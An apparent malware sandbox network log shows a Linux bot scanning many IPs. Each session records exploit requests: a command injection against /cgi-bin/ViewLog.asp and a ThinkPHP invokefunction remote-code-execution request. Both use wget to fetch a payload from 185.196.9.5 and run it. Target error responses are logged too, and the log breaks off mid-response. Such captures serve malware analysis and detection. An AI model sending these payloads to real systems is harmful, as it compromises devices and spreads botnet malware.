Feb 25, 2024 19:03:20.880666971 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
332	192.168.2.15	52586	31.200.7.237	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:20.882731915 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
333	192.168.2.15	36560	94.122.78.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.097103119 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
334	192.168.2.15	50094	94.123.117.229	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.097122908 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
335	192.168.2.15	37702	62.29.114.143	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.100567102 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
336	192.168.2.15	35868	94.123.2.214	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.104381084 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
337	192.168.2.15	59090	112.4.214.254	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.134510040 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:21.534172058 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sun, 25 Feb 2024 18:03:21 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
338	192.168.2.15	53098	88.96.218.158	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.315304041 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:21.496120930 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:03:21 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
339	192.168.2.15	43508	88.221.73.155	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.320025921 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:21.510437012 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Sun, 25 Feb 2024 18:03:21 GMT Date: Sun, 25 Feb 2024 18:03:21 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 62 34 39 64 64 35 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 30 31 26 23 34 36 3b 37 33 31 64 62 34 38 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9b49dd58.1708884201.731db489</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
340	192.168.2.15	37982	88.64.137.209	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.335052013 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:21.536683083 CET	456	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:21 GMT Server: Apache Strict-Transport-Security: max-age=15768000; includeSubDomains Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
341	192.168.2.15	35828	85.31.231.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.652173996 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.821990013 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
342	192.168.2.15	55842	94.253.17.96	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.652236938 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.374316931 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.601155996 CET	140	IN	HTTP/1.1 403 Forbidden Content-Type: text/html;charset=UTF-8 Content-Length: 0 Connection: close Cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
343	192.168.2.15	42358	95.214.144.201	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.858684063 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
344	192.168.2.15	54260	94.121.119.6	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:21.895659924 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
345	192.168.2.15	33330	31.46.168.138	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.069479942 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
346	192.168.2.15	36746	31.202.79.104	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.109855890 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.324254036 CET	445	IN	HTTP/1.1 401 Unauthorized Date: Sun, 25 Feb 2024 18:03:21 GMT Server: Boa/0.94.14rc21 Accept-Ranges: bytes Content-encoding: gzip Connection: close WWW-Authenticate: Basic realm="WF2780" user" Content-Type: text/html; charset=ISO-8859-1 Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 31 20 55 6e 61 75 74 68 6f 72 69 7a 65 64 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 67 65 74 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 66 72 6f 6d 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD><BODY><H1>401 Unauthorized</H1>Your client does not have permission to get URL /cgi-bin/ViewLog.asp from this server.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
347	192.168.2.15	51238	94.123.38.148	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.116911888 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
348	192.168.2.15	44080	94.120.18.11	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.120208979 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
349	192.168.2.15	51858	85.208.120.234	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:22.120352030 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:22.345352888 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Sun, 25 Feb 2024 17:33:39 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 